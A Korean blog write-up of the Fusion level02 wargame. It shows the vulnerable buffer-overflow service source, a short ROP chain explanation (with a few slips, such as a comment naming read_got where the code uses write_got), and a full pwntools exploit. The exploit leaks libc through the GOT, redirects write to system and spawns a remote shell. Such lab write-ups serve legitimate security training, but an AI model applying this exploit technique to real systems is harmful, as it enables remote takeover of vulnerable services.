exploit-exercise Fusion level-02
2018. 8. 14. 07:16ㆍWarGame/exploit-exercises.com-fusion
처음에 엄청 삽질해서 멘탈붕괴되다가 ROP다시한번 개념 제대로 잡자는 생각으로 풀었던 문제였다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 | #include "../common/common.c" #define XORSZ 32 void cipher(unsigned char *blah, size_t len) { static int keyed; static unsigned int keybuf[XORSZ]; int blocks; unsigned int *blahi, j; if(keyed == 0) { int fd; fd = open("/dev/urandom", O_RDONLY); if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE); close(fd); keyed = 1; } blahi = (unsigned int *)(blah); blocks = (len / 4); if(len & 3) blocks += 1; for(j = 0; j < blocks; j++) { blahi[j] ^= keybuf[j % XORSZ]; } } void encrypt_file() { // http://thedailywtf.com/Articles/Extensible-XML.aspx // maybe make bigger for inevitable xml-in-xml-in-xml ? unsigned char buffer[32 * 4096]; unsigned char op; size_t sz; int loop; printf("[-- Enterprise configuration file encryption service --]\n"); loop = 1; while(loop) { nread(0, &op, sizeof(op)); switch(op) { case 'E': nread(0, &sz, sizeof(sz)); nread(0, buffer, sz); cipher(buffer, sz); printf("[-- encryption complete. please mention " "474bd3ad-c65b-47ab-b041-602047ab8792 to support " "staff to retrieve your file --]\n"); nwrite(1, &sz, sizeof(sz)); nwrite(1, buffer, sz); break; case 'Q': loop = 0; break; default: exit(EXIT_FAILURE); } } } int main(int argc, char **argv, char **envp) { int fd; char *p; background_process(NAME, UID, GID); fd = serve_forever(PORT); set_io(fd); encrypt_file(); } | cs |
위에는 소스코드입니다.
간단 명료하게 설명하겠습니다.
pay += read_plt + pppr + 0 + bss + 8
#bss에 값 넣으려고 준비하기
pay += write_plt + pppr + 1 + read_got + 4
#read_got에 있는 4byte읽어오기
pay += read_plt + pppr + 0 + read_got + 4
#read_got에 4byte system주소 넣어주기( 뒤페이로드에서 넣어줌)
pay += write+plt + "BBBB" + bss
#/bin/sh 가 저장된 bss를 넣어주기.
대충 이런식으로 진행됩니다.
payload 는 다음과 같습니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 | # - *- coding: utf- 8 - *- from pwn import * def send_pay(value) : r.send("E" + p32(len(value)) + value) #send message def findkey() : send_pay("\x00"*128) r.recv(1024) return r.recv(1024)[-128:] #find key to do 0^key = key def enc(payload, key) : result="" for i in range(len(payload)) : result += chr(ord(key[i%128]) ^ ord(payload[i])) return result #encrytp with key #ip address and port r = remote("192.168.231.136",20002) #garget setting payload = "" pppr = p32(0x08048f85) read_plt = p32(0x08048860) write_got = p32(0x0804b3dc) read_got = p32(0x0804b384) write_plt = p32(0x080489c0) bss = p32(0x0804b420+0x200) shell = "/bin/sh\x00" offset = p32(0x84720) r.recv(1024) #find my key key = findkey() #make payload payload += "A"*(0x20000+0x10) payload += read_plt + pppr + p32(0) + bss + p32(8) payload += write_plt + pppr + p32(1) + read_got + p32(4) payload += read_plt + pppr + p32(0) + write_got + p32(4) payload += write_plt + "bbbb" + bss payload = enc(payload, key) send_pay(payload) print("[+] success send payload :)") r.recv(1024) recv = 0 while recv < len(payload): recv += len(r.recv(65536)) print("[+] success pass while") r.send('Q') r.send(shell) print("[+] sueecss send shell :)") read = u32(r.recv(4)) libcbase = read -0xc1240 log.info("Libcbase : 0x%x" % libcbase) system = libcbase + 0x3cb20 print("\n\n [+] system : " + hex(system)) print("[+]key : " + key) r.send(p32(system)) r.interactive() | cs |
(grin)
처음에 포기하고 다시봐서 시간이 오래걸렸네요 ㅠ
파이팅 ㅎㅎ
'WarGame > exploit-exercises.com-fusion' 카테고리의 다른 글
| exploit-exercise Fusion level-01 (0) | 2018.08.12 |
|---|---|
| exploit-exercise Fusion level-00 (0) | 2018.08.10 |